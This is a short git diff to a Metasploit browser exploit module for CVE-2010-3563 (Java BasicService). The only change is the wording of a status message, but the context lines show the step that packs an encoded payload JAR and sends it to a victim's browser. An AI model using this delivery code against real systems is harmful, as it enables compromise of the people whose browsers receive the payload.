diff --git a/modules/exploits/windows/browser/java_basicservice_impl.rb b/modules/exploits/windows/browser/java_basicservice_impl.rb index 763b73df9d..5327da2238 100644 --- a/modules/exploits/windows/browser/java_basicservice_impl.rb +++ b/modules/exploits/windows/browser/java_basicservice_impl.rb @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote dir = [ Msf::Config.data_directory, "exploits", "cve-2010-3563" ] jar = p.encoded_jar jar.add_files(paths, dir) - print_status("Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}...") + print_status("Sending Jar file to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, jar.pack, { 'Content-Type' => "application/octet-stream" }) handler(cli)